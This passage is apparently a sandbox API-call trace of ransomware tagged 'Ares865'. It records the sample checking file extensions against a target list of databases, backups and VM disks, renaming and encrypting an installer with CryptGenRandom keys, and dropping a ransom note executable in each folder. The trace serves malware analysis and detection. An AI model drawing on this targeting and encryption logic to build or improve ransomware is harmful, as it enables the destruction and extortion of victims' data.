[0069.531] lstrcmpiW (lpString1="xe", lpString2="nv") returned 1 [0069.531] lstrlenW (lpString="nv2") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="nv2") returned -1 [0069.531] lstrlenW (lpString="nwdb") returned 4 [0069.531] lstrcmpiW (lpString1=".exe", lpString2="nwdb") returned -1 [0069.531] lstrlenW (lpString="nyf") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="nyf") returned -1 [0069.531] lstrlenW (lpString="odb") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="odb") returned -1 [0069.531] lstrlenW (lpString="odb") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="odb") returned -1 [0069.531] lstrlenW (lpString="oqy") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="oqy") returned -1 [0069.531] lstrlenW (lpString="ora") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="ora") returned -1 [0069.531] lstrlenW (lpString="orx") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="orx") returned -1 [0069.532] lstrlenW (lpString="owc") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="owc") returned -1 [0069.532] lstrlenW (lpString="p96") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="p96") returned -1 [0069.532] lstrlenW (lpString="p97") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="p97") returned -1 [0069.532] lstrlenW (lpString="pan") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="pan") returned -1 [0069.532] lstrlenW (lpString="pdb") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="pdb") returned -1 [0069.532] lstrlenW (lpString="pdm") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="pdm") returned -1 [0069.532] lstrlenW (lpString="pnz") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="pnz") returned -1 [0069.532] lstrlenW (lpString="qry") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="qry") returned -1 [0069.532] lstrlenW (lpString="qvd") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="qvd") returned -1 [0069.532] lstrlenW (lpString="rbf") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="rbf") returned -1 [0069.532] lstrlenW (lpString="rctd") returned 4 [0069.532] lstrcmpiW (lpString1=".exe", lpString2="rctd") returned -1 [0069.532] lstrlenW (lpString="rod") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="rod") returned -1 [0069.532] lstrlenW (lpString="rodx") returned 4 [0069.532] lstrcmpiW (lpString1=".exe", lpString2="rodx") returned -1 [0069.532] lstrlenW (lpString="rpd") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="rpd") returned -1 [0069.532] lstrlenW (lpString="rsd") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="rsd") returned -1 [0069.532] lstrlenW (lpString="sas7bdat") returned 8 [0069.532] lstrcmpiW (lpString1=".x86.exe", lpString2="sas7bdat") returned -1 [0069.532] lstrlenW (lpString="sbf") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="sbf") returned -1 [0069.532] lstrlenW (lpString="scx") returned 3 [0069.532] lstrcmpiW (lpString1="exe", lpString2="scx") returned -1 [0069.532] lstrlenW (lpString="sdb") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="sdb") returned -1 [0069.533] lstrlenW (lpString="sdc") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="sdc") returned -1 [0069.533] lstrlenW (lpString="sdf") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="sdf") returned -1 [0069.533] lstrlenW (lpString="sis") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="sis") returned -1 [0069.533] lstrlenW (lpString="spq") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="spq") returned -1 [0069.533] lstrlenW (lpString="te") returned 2 [0069.533] lstrcmpiW (lpString1="xe", lpString2="te") returned 1 [0069.533] lstrlenW (lpString="teacher") returned 7 [0069.533] lstrcmpiW (lpString1="x86.exe", lpString2="teacher") returned 1 [0069.533] lstrlenW (lpString="tmd") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="tmd") returned -1 [0069.533] lstrlenW (lpString="tps") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="tps") returned -1 [0069.533] lstrlenW (lpString="trc") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="trc") returned -1 [0069.533] lstrlenW (lpString="trc") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="trc") returned -1 [0069.533] lstrlenW (lpString="trm") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="trm") returned -1 [0069.533] lstrlenW (lpString="udb") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="udb") returned -1 [0069.533] lstrlenW (lpString="udl") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="udl") returned -1 [0069.533] lstrlenW (lpString="usr") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="usr") returned -1 [0069.533] lstrlenW (lpString="v12") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="v12") returned -1 [0069.533] lstrlenW (lpString="vis") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="vis") returned -1 [0069.533] lstrlenW (lpString="vpd") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="vpd") returned -1 [0069.533] lstrlenW (lpString="vvv") returned 3 [0069.533] lstrcmpiW (lpString1="exe", lpString2="vvv") returned -1 [0069.533] lstrlenW (lpString="wdb") returned 3 [0069.534] lstrcmpiW (lpString1="exe", lpString2="wdb") returned -1 [0069.534] lstrlenW (lpString="wmdb") returned 4 [0069.534] lstrcmpiW (lpString1=".exe", lpString2="wmdb") returned -1 [0069.534] lstrlenW (lpString="wrk") returned 3 [0069.534] lstrcmpiW (lpString1="exe", lpString2="wrk") returned -1 [0069.534] lstrlenW (lpString="xdb") returned 3 [0069.534] lstrcmpiW (lpString1="exe", lpString2="xdb") returned -1 [0069.534] lstrlenW (lpString="xld") returned 3 [0069.534] lstrcmpiW (lpString1="exe", lpString2="xld") returned -1 [0069.534] lstrlenW (lpString="xmlff") returned 5 [0069.534] lstrcmpiW (lpString1="6.exe", lpString2="xmlff") returned -1 [0069.534] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.Ares865") returned 97 [0069.534] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.ares865"), dwFlags=0x1) returned 1 [0069.535] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0069.535] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=781872) returned 1 [0069.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0069.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0069.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0069.536] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0069.536] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0069.536] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.536] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf130, lpName=0x0) returned 0x154 [0069.538] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf130) returned 0x2ad0000 [0069.661] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0069.661] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0069.661] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0069.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0069.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0069.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0069.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0069.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0069.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0069.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0069.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0069.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0069.662] UnmapViewOfFile (lpBaseAddress=0x2ad0000) returned 1 [0069.670] CloseHandle (hObject=0x154) returned 1 [0069.670] CloseHandle (hObject=0x120) returned 1 [0069.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0069.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0069.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0069.679] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93c9960, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xedfa2720, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0xbee30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0 [0069.679] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0069.680] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2648 [0069.680] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0069.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0008 | out: hHeap=0x2b0000) returned 1 [0069.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0069.683] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 71 [0069.684] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0069.684] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0069.685] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0069.689] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0069.691] GetLastError () returned 0x0 [0069.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0069.692] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0069.692] CloseHandle (hObject=0x118) returned 1 [0069.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0069.693] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0069.693] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc63fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0069.698] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0069.698] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0069.698] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.698] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc63fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.699] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0069.705] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0069.705] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.705] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.705] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bc63fa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0069.705] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0069.705] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcad7040, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x105e7220, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x29a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2="aoldtz.exe") returned 1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2="bootmgr") returned 1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2="temp") returned -1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2="pagefile.sys") returned 1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2="boot") returned 1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2="ids.txt") returned 1 [0069.706] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0069.707] lstrcmpiW (lpString1="state.rsm", lpString2="perflogs") returned 1 [0069.707] lstrcmpiW (lpString1="state.rsm", lpString2="MSBuild") returned 1 [0069.707] lstrlenW (lpString="state.rsm") returned 9 [0069.707] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*") returned 73 [0069.707] lstrcpyW (in: lpString1=0x2cce490, lpString2="state.rsm" | out: lpString1="state.rsm") returned="state.rsm" [0069.707] lstrlenW (lpString="state.rsm") returned 9 [0069.707] lstrlenW (lpString="Ares865") returned 7 [0069.707] lstrcmpiW (lpString1="ate.rsm", lpString2="Ares865") returned 1 [0069.707] lstrlenW (lpString=".dll") returned 4 [0069.707] lstrcmpiW (lpString1="state.rsm", lpString2=".dll") returned 1 [0069.707] lstrlenW (lpString=".lnk") returned 4 [0069.708] lstrcmpiW (lpString1="state.rsm", lpString2=".lnk") returned 1 [0069.708] lstrlenW (lpString=".ini") returned 4 [0069.708] lstrcmpiW (lpString1="state.rsm", lpString2=".ini") returned 1 [0069.708] lstrlenW (lpString=".sys") returned 4 [0069.708] lstrcmpiW (lpString1="state.rsm", lpString2=".sys") returned 1 [0069.708] lstrlenW (lpString="state.rsm") returned 9 [0069.708] lstrlenW (lpString="bak") returned 3 [0069.708] lstrcmpiW (lpString1="rsm", lpString2="bak") returned 1 [0069.708] lstrlenW (lpString="ba_") returned 3 [0069.708] lstrcmpiW (lpString1="rsm", lpString2="ba_") returned 1 [0069.708] lstrlenW (lpString="dbb") returned 3 [0069.710] lstrcmpiW (lpString1="rsm", lpString2="dbb") returned 1 [0069.710] lstrlenW (lpString="vmdk") returned 4 [0069.710] lstrcmpiW (lpString1=".rsm", lpString2="vmdk") returned -1 [0069.710] lstrlenW (lpString="rar") returned 3 [0069.711] lstrcmpiW (lpString1="rsm", lpString2="rar") returned 1 [0069.711] lstrlenW (lpString="zip") returned 3 [0069.711] lstrcmpiW (lpString1="rsm", lpString2="zip") returned -1 [0069.711] lstrlenW (lpString="tgz") returned 3 [0069.712] lstrcmpiW (lpString1="rsm", lpString2="tgz") returned -1 [0069.712] lstrlenW (lpString="vbox") returned 4 [0069.712] lstrcmpiW (lpString1=".rsm", lpString2="vbox") returned -1 [0069.713] lstrlenW (lpString="vdi") returned 3 [0069.714] lstrcmpiW (lpString1="rsm", lpString2="vdi") returned -1 [0069.714] lstrlenW (lpString="vhd") returned 3 [0069.725] lstrcmpiW (lpString1="rsm", lpString2="vhd") returned -1 [0069.725] lstrlenW (lpString="vhdx") returned 4 [0069.725] lstrcmpiW (lpString1=".rsm", lpString2="vhdx") returned -1 [0069.725] lstrlenW (lpString="avhd") returned 4 [0069.725] lstrcmpiW (lpString1=".rsm", lpString2="avhd") returned -1 [0069.726] lstrlenW (lpString="db") returned 2 [0069.727] lstrcmpiW (lpString1="sm", lpString2="db") returned 1 [0069.727] lstrlenW (lpString="db2") returned 3 [0069.727] lstrcmpiW (lpString1="rsm", lpString2="db2") returned 1 [0069.727] lstrlenW (lpString="db3") returned 3 [0069.727] lstrcmpiW (lpString1="rsm", lpString2="db3") returned 1 [0069.727] lstrlenW (lpString="dbf") returned 3 [0069.727] lstrcmpiW (lpString1="rsm", lpString2="dbf") returned 1 [0069.727] lstrlenW (lpString="mdf") returned 3 [0069.727] lstrcmpiW (lpString1="rsm", lpString2="mdf") returned 1 [0069.727] lstrlenW (lpString="mdb") returned 3 [0069.727] lstrcmpiW (lpString1="rsm", lpString2="mdb") returned 1 [0069.727] lstrlenW (lpString="sql") returned 3 [0069.727] lstrcmpiW (lpString1="rsm", lpString2="sql") returned -1 [0069.727] lstrlenW (lpString="sqlite") returned 6 [0069.727] lstrcmpiW (lpString1="te.rsm", lpString2="sqlite") returned 1 [0069.727] lstrlenW (lpString="sqlite3") returned 7 [0069.728] lstrcmpiW (lpString1="ate.rsm", lpString2="sqlite3") returned -1 [0069.728] lstrlenW (lpString="sqlitedb") returned 8 [0069.728] lstrcmpiW (lpString1="tate.rsm", lpString2="sqlitedb") returned 1 [0069.728] lstrlenW (lpString="xml") returned 3 [0069.728] lstrcmpiW (lpString1="rsm", lpString2="xml") returned -1 [0069.728] lstrlenW (lpString="$er") returned 3 [0069.728] lstrcmpiW (lpString1="rsm", lpString2="$er") returned 1 [0069.731] lstrlenW (lpString="4dd") returned 3 [0069.731] lstrcmpiW (lpString1="rsm", lpString2="4dd") returned 1 [0069.731] lstrlenW (lpString="4dl") returned 3 [0069.731] lstrcmpiW (lpString1="rsm", lpString2="4dl") returned 1 [0069.732] lstrlenW (lpString="^^^") returned 3 [0069.732] lstrcmpiW (lpString1="rsm", lpString2="^^^") returned 1 [0069.736] lstrlenW (lpString="abs") returned 3 [0069.736] lstrcmpiW (lpString1="rsm", lpString2="abs") returned 1 [0069.736] lstrlenW (lpString="abx") returned 3 [0069.736] lstrcmpiW (lpString1="rsm", lpString2="abx") returned 1 [0069.737] lstrlenW (lpString="accdb") returned 5 [0069.737] lstrcmpiW (lpString1="e.rsm", lpString2="accdb") returned 1 [0069.737] lstrlenW (lpString="accdc") returned 5 [0069.738] lstrcmpiW (lpString1="e.rsm", lpString2="accdc") returned 1 [0069.741] lstrlenW (lpString="accde") returned 5 [0069.741] lstrcmpiW (lpString1="e.rsm", lpString2="accde") returned 1 [0069.741] lstrlenW (lpString="accdr") returned 5 [0069.741] lstrcmpiW (lpString1="e.rsm", lpString2="accdr") returned 1 [0069.741] lstrlenW (lpString="accdt") returned 5 [0069.741] lstrcmpiW (lpString1="e.rsm", lpString2="accdt") returned 1 [0069.743] lstrlenW (lpString="accdw") returned 5 [0069.743] lstrcmpiW (lpString1="e.rsm", lpString2="accdw") returned 1 [0069.743] lstrlenW (lpString="accft") returned 5 [0069.743] lstrcmpiW (lpString1="e.rsm", lpString2="accft") returned 1 [0069.743] lstrlenW (lpString="adb") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0069.743] lstrlenW (lpString="adb") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0069.743] lstrlenW (lpString="ade") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="ade") returned 1 [0069.743] lstrlenW (lpString="adf") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="adf") returned 1 [0069.743] lstrlenW (lpString="adn") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="adn") returned 1 [0069.743] lstrlenW (lpString="adp") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="adp") returned 1 [0069.743] lstrlenW (lpString="alf") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="alf") returned 1 [0069.743] lstrlenW (lpString="ask") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="ask") returned 1 [0069.743] lstrlenW (lpString="btr") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="btr") returned 1 [0069.743] lstrlenW (lpString="cat") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="cat") returned 1 [0069.743] lstrlenW (lpString="cdb") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="cdb") returned 1 [0069.743] lstrlenW (lpString="ckp") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="ckp") returned 1 [0069.743] lstrlenW (lpString="cma") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="cma") returned 1 [0069.743] lstrlenW (lpString="cpd") returned 3 [0069.743] lstrcmpiW (lpString1="rsm", lpString2="cpd") returned 1 [0069.743] lstrlenW (lpString="dacpac") returned 6 [0069.744] lstrcmpiW (lpString1="te.rsm", lpString2="dacpac") returned 1 [0069.744] lstrlenW (lpString="dad") returned 3 [0069.744] lstrcmpiW (lpString1="rsm", lpString2="dad") returned 1 [0069.744] lstrlenW (lpString="dadiagrams") returned 10 [0069.744] lstrlenW (lpString="daschema") returned 8 [0069.744] lstrcmpiW (lpString1="tate.rsm", lpString2="daschema") returned 1 [0069.744] lstrlenW (lpString="db-journal") returned 10 [0069.744] lstrlenW (lpString="db-shm") returned 6 [0069.744] lstrcmpiW (lpString1="te.rsm", lpString2="db-shm") returned 1 [0069.744] lstrlenW (lpString="db-wal") returned 6 [0069.744] lstrcmpiW (lpString1="te.rsm", lpString2="db-wal") returned 1 [0069.744] lstrlenW (lpString="dbc") returned 3 [0069.744] lstrcmpiW (lpString1="rsm", lpString2="dbc") returned 1 [0069.744] lstrlenW (lpString="dbs") returned 3 [0069.744] lstrcmpiW (lpString1="rsm", lpString2="dbs") returned 1 [0069.744] lstrlenW (lpString="dbt") returned 3 [0069.744] lstrcmpiW (lpString1="rsm", lpString2="dbt") returned 1 [0069.744] lstrlenW (lpString="dbv") returned 3 [0069.744] lstrcmpiW (lpString1="rsm", lpString2="dbv") returned 1 [0069.748] lstrlenW (lpString="dbx") returned 3 [0069.748] lstrcmpiW (lpString1="rsm", lpString2="dbx") returned 1 [0069.748] lstrlenW (lpString="dcb") returned 3 [0069.748] lstrcmpiW (lpString1="rsm", lpString2="dcb") returned 1 [0069.749] lstrlenW (lpString="dct") returned 3 [0069.749] lstrcmpiW (lpString1="rsm", lpString2="dct") returned 1 [0069.749] lstrlenW (lpString="dcx") returned 3 [0069.749] lstrcmpiW (lpString1="rsm", lpString2="dcx") returned 1 [0069.749] lstrlenW (lpString="ddl") returned 3 [0069.749] lstrcmpiW (lpString1="rsm", lpString2="ddl") returned 1 [0069.749] lstrlenW (lpString="dlis") returned 4 [0069.749] lstrcmpiW (lpString1=".rsm", lpString2="dlis") returned -1 [0069.749] lstrlenW (lpString="dp1") returned 3 [0069.749] lstrcmpiW (lpString1="rsm", lpString2="dp1") returned 1 [0069.754] lstrlenW (lpString="dqy") returned 3 [0069.754] lstrcmpiW (lpString1="rsm", lpString2="dqy") returned 1 [0069.754] lstrlenW (lpString="dsk") returned 3 [0069.757] lstrcmpiW (lpString1="rsm", lpString2="dsk") returned 1 [0069.757] lstrlenW (lpString="dsn") returned 3 [0069.759] lstrcmpiW (lpString1="rsm", lpString2="dsn") returned 1 [0069.759] lstrlenW (lpString="dtsx") returned 4 [0069.759] lstrcmpiW (lpString1=".rsm", lpString2="dtsx") returned -1 [0069.761] lstrlenW (lpString="dxl") returned 3 [0069.761] 